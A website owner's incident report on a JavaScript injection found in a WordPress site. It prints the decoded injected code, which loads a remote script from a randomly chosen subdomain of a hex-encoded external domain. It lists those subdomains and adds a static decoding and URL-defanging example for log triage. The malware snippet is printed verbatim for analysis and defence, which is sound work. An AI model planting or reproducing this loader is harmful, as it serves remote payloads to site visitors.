Javascript Injection Report – based in etufg.com
I have just discovered an incident of Javascript Injection on my WordPress-based website. I am running the latest version of WP, and all associated plugins.
The raw code is inserted just after the opening <body> tag. The raw code is:
[hack code moderated]
This can be decoded to:
<ads><script type="text/javascript">document.write( <script>var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="http://'+g[h]+'.\x65\x74\x75\x66\x67\x2e\x63\x6f\x6d/tools/js.js"><\/script>')};</script> );</script></ads>
The URL at the end, which seems to be the co-ordinating centre for the attack, is in hex, and translates to:
etufg.com
So, this code seems to be randomly picking one of the following subdomains within that domain:
- keg.etufg.com
- kei.etufg.com
- ken.etufg.com
- kep.etufg.com
- kev.etufg.com
- kex.etufg.com
- key.etufg.com
- khi.etufg.com
- kid.etufg.com
- kif.etufg.com
I would not be surprised if further subdomains and/or domains are involved, but this is just the rest of my first 40 minutes of investigations.
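The decoding described in the post above can be done statically, without ever evaluating the injected script. The following is an added example, not part of the original post: `SAMPLE` is constructed from the decoded code quoted above (trimmed), and the function names are hypothetical.

```javascript
// Added example: static triage only; the injected snippet is never evaluated.
// SAMPLE is constructed from the decoded code quoted in the post (trimmed).
const SAMPLE = String.raw`var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);document.write('<script type="text/javascript" src="http://'+g[h]+'.\x65\x74\x75\x66\x67\x2e\x63\x6f\x6d/tools/js.js"><\/script>')`;

// Turn \xNN escapes inside JS string literals into the characters they hide.
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Find a script src built as 'http://' + ARRAY[INDEX] + '.suffix/path' and
// expand it against the string array literal assigned to ARRAY.
function extractLoaderUrls(src) {
  const decoded = decodeHexEscapes(src);
  const m = decoded.match(
    /src="(https?:\/\/)'\s*\+\s*(\w+)\[\w+\]\s*\+\s*'([^"\/]+)(\/[^"]*)"/);
  if (!m) return [];
  const [, scheme, arrayName, suffix, path] = m;
  const arr = decoded.match(
    new RegExp("\\b" + arrayName + "\\s*=\\s*\\[([^\\]]*)\\]"));
  if (!arr) return [];
  const labels = [...arr[1].matchAll(/"([^"]*)"/g)].map((x) => x[1]);
  return labels.map((label) => ({
    host: label + suffix,
    url: scheme + label + suffix + path,
  }));
}

// Defang a URL or host so it can be pasted into a ticket or blocklist review.
function defang(s) {
  return s.replace(/^http/, "hxxp").replace(/\./g, "[.]");
}

for (const { host, url } of extractLoaderUrls(SAMPLE)) {
  console.log(host, defang(url));
}
```

The resulting host list can be matched against web server and proxy logs to see which visitors were sent to the loader script.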